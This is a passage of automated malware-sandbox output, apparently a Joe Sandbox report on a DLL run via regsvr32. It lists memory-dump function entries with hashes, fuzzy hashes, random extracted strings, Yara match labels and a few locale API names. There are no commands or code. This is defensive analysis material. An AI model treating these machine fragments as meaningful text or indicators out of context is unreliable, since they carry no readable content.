                                                                    • Opcode Fuzzy Hash: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                    • Instruction Fuzzy Hash: 1351D47011478A8BCB48DF28C896ADE3FA1FB58348F114618FC668B264C7B4E665CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 3*$qMu
                                                                    • API String ID: 0-4093015089
                                                                    • Opcode ID: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                    • Instruction ID: 306475205ddf6f42a3ecfe0a1797163739854d195c0d735865f936de0d0f8307
                                                                    • Opcode Fuzzy Hash: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                    • Instruction Fuzzy Hash: 445122B09147189BCB88CFA8E4CA9CDBBF1FF48354F609119F806A7255DB709984CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$"n&E
                                                                    • API String ID: 0-1188898577
                                                                    • Opcode ID: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                    • Instruction ID: 5f040a851564d75eb680569e00f78a68740ad3a482e782991b4ea7036c242a73
                                                                    • Opcode Fuzzy Hash: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                    • Instruction Fuzzy Hash: 3851CEB190038E8FCB48DF68D8865DE7BB1FB48344F018A1DE866AB250D7B4D665CB94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Bw~$fy
                                                                    • API String ID: 0-1663007907
                                                                    • Opcode ID: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                    • Instruction ID: 54d1d0e0fa6abfe6c6c31828b0edda1727153ea8c56c584fcf89706de6b20d2b
                                                                    • Opcode Fuzzy Hash: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                    • Instruction Fuzzy Hash: FC51D2B090038A8FCB48CF64C88A5DE7FB1FB48348F51861DFC26AA250D3B4D664CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: /0$XyLe
                                                                    • API String ID: 0-3562702181
                                                                    • Opcode ID: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                    • Instruction ID: 167cd3e3c855d70dfa0c36df1993a56b415187eb75226b1b3cef09056e291559
                                                                    • Opcode Fuzzy Hash: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                    • Instruction Fuzzy Hash: 5751C2B090034E8FDB48DF68C49A5DE7FB0FB68398F20421DE856A6250D37496A4CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >I$>I
                                                                    • API String ID: 0-3948471910
                                                                    • Opcode ID: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                    • Instruction ID: a225938552342fdcd3306cc52f41137c6a5b776406488479516cfafb05d577e3
                                                                    • Opcode Fuzzy Hash: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                    • Instruction Fuzzy Hash: 8D41F0B0909B849BC788DF68C18A90AFBE0FBD8704F505A1DF5858B660DBB4D806CF42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: {H2}$}i#c
                                                                    • API String ID: 0-1724349491
                                                                    • Opcode ID: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                    • Instruction ID: 37d5b784c44c013357b808598ceb46bd6ed98c7a9730d3ab63b6bf10ba55f6e5
                                                                    • Opcode Fuzzy Hash: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                    • Instruction Fuzzy Hash: 3941EAB190078A8BCF48CF68C89A1DE7BB1FB58358F11461DE866A6250D3B49664CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4V$so
                                                                    • API String ID: 0-1060102820
                                                                    • Opcode ID: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                    • Instruction ID: d444a7ea2620fcfa6eb466004a6e01db215641729881944e94261e2193751ac2
                                                                    • Opcode Fuzzy Hash: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                    • Instruction Fuzzy Hash: 8E41BEB180034A8FCB48CF64C88A5DE7FB1FB68398F104619E859A6250D3B4D6A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: F+'$O$
                                                                    • API String ID: 0-4064122715
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 1$bO6
                                                                    • API String ID: 0-3242911120
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )j-J$\rba
                                                                    • API String ID: 0-105394296
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 5T$7c
                                                                    • API String ID: 0-2666566123
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ",)x$PX
                                                                    • API String ID: 0-926260526
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • EnumSystemLocalesA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8CA9B5A8C), ref: 00007FF8CA9BC8FD
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale_getptd
                                                                    • String ID:
                                                                    • API String ID: 3731964398-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: cYte
                                                                    • API String ID: 0-489798635
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Pc
                                                                    • API String ID: 0-2609325410
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: g >
                                                                    • API String ID: 0-3862707646
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2
                                                                    • API String ID: 0-2012265552
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Wcl
                                                                    • API String ID: 0-2623992880
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ws8
                                                                    • API String ID: 0-2196714860
                                                                    • Opcode ID: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                    • Instruction ID: b480ef2199d1fafa288ff61c3bcffdce570952497d21d470c9db593eaacbee88
                                                                    • Opcode Fuzzy Hash: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                    • Instruction Fuzzy Hash: 54711A70A0470E8FDB59DFA8C45AAEFBBF2FB54348F004119D806A7291DB749A19CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: p/g
                                                                    • API String ID: 0-1786412500
                                                                    • Opcode ID: 12e0429f3d25b53aa03a660b5e037e54bcd2ac93df657abae010b2d02fa62e0c
                                                                    • Instruction ID: ede728f5e2ba0833d242d52ca27ad93f20c36497480e8c5f25a004cbad49378e
                                                                    • Opcode Fuzzy Hash: 12e0429f3d25b53aa03a660b5e037e54bcd2ac93df657abae010b2d02fa62e0c
                                                                    • Instruction Fuzzy Hash: F58108B050434E8FCB88DF68D88A6DE7FF0FB58358F105659E85A96250D3B8D694CF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %
                                                                    • API String ID: 0-3714942587
                                                                    • Opcode ID: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                    • Instruction ID: d5d5bf94d11651037a836977de8f66422f038c9f5d7a5f915f0cc542ec650b78
                                                                    • Opcode Fuzzy Hash: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                    • Instruction Fuzzy Hash: 5A516974606608CBDB69DF38D4D57A937E1EF68305F20412DF866C72A2DB70D9258B88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: A.}
                                                                    • API String ID: 0-2880059976
                                                                    • Opcode ID: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                    • Instruction ID: 2f0cd8bb00c33d355f5bc07b1ff950bf82d6730f12d3cb6082a6ef1b734ff39e
                                                                    • Opcode Fuzzy Hash: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                    • Instruction Fuzzy Hash: 8E618FB190078E8FCF48DF68C88A5DE7BB1FB58318F004A1DE86696250D7B49A65CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0#
                                                                    • API String ID: 0-456275806
                                                                    • Opcode ID: 2a5e92d38432702302bb854991be2d1fec0b328a8259ee1ce7fe1531fc30a302
                                                                    • Instruction ID: 4563f3e02f76dde2de765371aa44af8a356bdaf4307918038d119139e73a9611
                                                                    • Opcode Fuzzy Hash: 2a5e92d38432702302bb854991be2d1fec0b328a8259ee1ce7fe1531fc30a302
                                                                    • Instruction Fuzzy Hash: A6415E70608B488FC768DF19D4897AABBF1FB99301F404A6DE58AC7251DB70D849CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: n)
                                                                    • API String ID: 0-1227437150
                                                                    • Opcode ID: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                    • Instruction ID: dd456011ca79f85f31d8ff0d6df60f6896318ebd7e2af4f5172cd91629f08304
                                                                    • Opcode Fuzzy Hash: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                    • Instruction Fuzzy Hash: 9761ADB090074E8FCB48DF68D58A5CE7FF0FB68398F204219E856A6260D37496A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: H&0
                                                                    • API String ID: 0-1691334370
                                                                    • Opcode ID: 176f3dafecf3041be65652fa330368668244bab9b7972e65e66ffc3ed07b0be6
                                                                    • Instruction ID: 434fd06cb4e7b9e5ef59c8cf231445956357c0a0e2562e482aef1b34ca23bdad
                                                                    • Opcode Fuzzy Hash: 176f3dafecf3041be65652fa330368668244bab9b7972e65e66ffc3ed07b0be6
                                                                    • Instruction Fuzzy Hash: F8511970519784ABD7D9CF28C4C5B5EBBE0FB88794F90691EF486C62A0CB74C9498B03
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: <+o
                                                                    • API String ID: 0-2035106886
                                                                    • Opcode ID: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                    • Instruction ID: 908cc80fe280ddd0bfa2415e6bae89ce11b1f5b72da4428c53a3215ac7c7145d
                                                                    • Opcode Fuzzy Hash: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                    • Instruction Fuzzy Hash: 7A51DFB090034E8BCB48CF68C9965DE7BB0FB58348F11861DEC26AA350D3B4D664CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2d
                                                                    • API String ID: 0-3866551247
                                                                    • Opcode ID: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                    • Instruction ID: 258b54a6104a0115c80ff1d617aa7636393a642c0cf89d14f7baa21f525a3413
                                                                    • Opcode Fuzzy Hash: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                    • Instruction Fuzzy Hash: 4641CFB05087858FD358DF68C58A61AFBF1BBCA344F108A1EF685CB260D7B6D945CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ZF{;
                                                                    • API String ID: 0-2351138993
                                                                    • Opcode ID: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                    • Instruction ID: 7873f037b774218c73d9d67b0eeaf548a3a2a69e6d8f7c9b30684cba1c01e4e1
                                                                    • Opcode Fuzzy Hash: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                    • Instruction Fuzzy Hash: 525192B180034A8FCB48CF68D48A5DE7FB0FB68398F20461DF956A6250D3B596A4CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: o^
                                                                    • API String ID: 0-3380573087
                                                                    • Opcode ID: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                    • Instruction ID: 59a9f6ae0c87b179395b4bbd7662f2404235addd18437060f8b1d9c1d0f8b2e4
                                                                    • Opcode Fuzzy Hash: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                    • Instruction Fuzzy Hash: 97419FB091034A9FCB48DF68C4865CEBFB0FB68394F20561AF856A6250D3B4D6A4CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8N
                                                                    • API String ID: 0-1657423088
                                                                    • Opcode ID: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                    • Instruction ID: 05e8e8e61cf54c40f354227930f27795623571b92907d2ce5de0c79af9b5eb72
                                                                    • Opcode Fuzzy Hash: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                    • Instruction Fuzzy Hash: 3041B2B180078A8FCF48DF68D88A5DE7BF0FB48344F515619F82AA6250D3B49664CF94
                                                                    Uniqueness

